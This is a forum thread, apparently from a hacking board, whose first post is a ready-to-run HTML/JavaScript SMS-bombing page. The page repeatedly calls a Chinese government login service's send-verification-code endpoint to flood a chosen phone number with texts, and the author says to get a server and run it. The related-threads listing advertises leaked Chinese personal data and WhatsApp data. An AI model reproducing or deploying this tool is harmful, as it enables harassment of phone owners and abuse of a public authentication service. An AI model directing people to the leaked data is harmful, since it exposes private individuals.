Chinese phone number text attack
by ssdkl - Tuesday August 29, 2023 at 04:54 AM
#1
<!DOCTYPE html> <html> <head>   <title>短信发送页面</title>   <style>     body {       font-family: Arial, sans-serif;       background-color: #f0f0f0;       margin: 0;       padding: 20px;     }     h1 {       text-align: center;     }     .container {       max-width: 400px;       margin: 0 auto;       background-color: #fff;       padding: 20px;       border-radius: 5px;       box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);     }     .form-group {       margin-bottom: 15px;     }     .form-group label,     .form-group input {       display: block;       width: 100%;     }     .form-group label {       margin-bottom: 5px;     }     .form-group input[type="text"],     .form-group input[type="number"] {       padding: 5px;       border-radius: 3px;       border: 1px solid #ccc;     }     .form-group .btn {       background-color: #4caf50;       color: #fff;       padding: 8px 12px;       border-radius: 3px;       border: none;       cursor: pointer;     }     .form-group .btn:hover {       background-color: #45a049;     }     .message {       margin-top: 20px;       padding: 10px;       background-color: #f2f2f2;       border-radius: 3px;     }   </style> </head> <body>   <h1>短信发送页面</h1>   <div class="container">     <div class="form-group">       <label for="mobilephone">手机号码:</label>       <input type="number" id="mobilephone" placeholder="enter number">     </div>     <div class="form-group">       <label for="times">请求次数:</label>       <input type="number" id="times" placeholder="enter how many texts">     </div>     <div class="form-group">       <button class="btn" onclick="sendSMS()">发送短信</button>     </div>     <div class="message"></div>   </div>   <script>     function sendSMS() {       var mobilephone = document.getElementById('mobilephone').value;       var times = parseInt(document.getElementById('times').value);       // 验证手机号和请求次数       if (!mobilephone  isNaN(times)  times <= 0) {         showMessage('pleaese enter correct ');         return;       }number and times       // 发送请求       var apiUrl = 'https://puser.zjzwfw.gov.cn:443/sso/usp.do';       var action = 'sendsmscode';       var msgtype = 'login';       for (var i = 0; i < times; i++) {         sendRequest(apiUrl, action, mobilephone, msgtype);       }     }     function sendRequest(url, action, mobilephone, msgtype) {       var params = 'action=' + encodeURIComponent(action) +                   '&mobilephone=' + encodeURIComponent(mobilephone) +                   '&msgtype=' + encodeURIComponent(msgtype);       var xhr = new XMLHttpRequest();       xhr.open('POST', url, true);       xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');       xhr.onreadystatechange = function() {         if (xhr.readyState === 4) {           if (xhr.status === 200) {             showMessage('succeed');           } else {             showMessage('fail');           }         }       }       xhr.send(params);     }     function showMessage(msg) {       var messageDiv = document.querySelector('.message');       messageDiv.textContent = msg;     }   </script> </body> </html>
get a server and run this
Reply
#2
Where do you get the interface from?
Reply
#3
"
this might be interesting to look at"
Reply
#4
thanks broo ill see it

wow i have look at that
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Chinese data (中国数据)-SnowSoul ID-1273 SnowSoul 0 966 03-28-2026, 03:08 AM
Last Post: SnowSoul
  Chinese people living in the United States WhatsApp Data Razia 1 977 03-27-2026, 04:32 PM
Last Post: Dulnex
  Chinese data- Free download -30 G (中国数据)-1243 SnowSoul 1 608 03-27-2026, 09:11 AM
Last Post: M0chacha
  Chinese data (中国数据)-SnowSoul ID-1263 SnowSoul 0 540 03-27-2026, 08:40 AM
Last Post: SnowSoul
  Chinese data (中国数据)-SnowSoul ID-1247 SnowSoul 0 510 03-27-2026, 08:05 AM
Last Post: SnowSoul



 Users browsing this thread: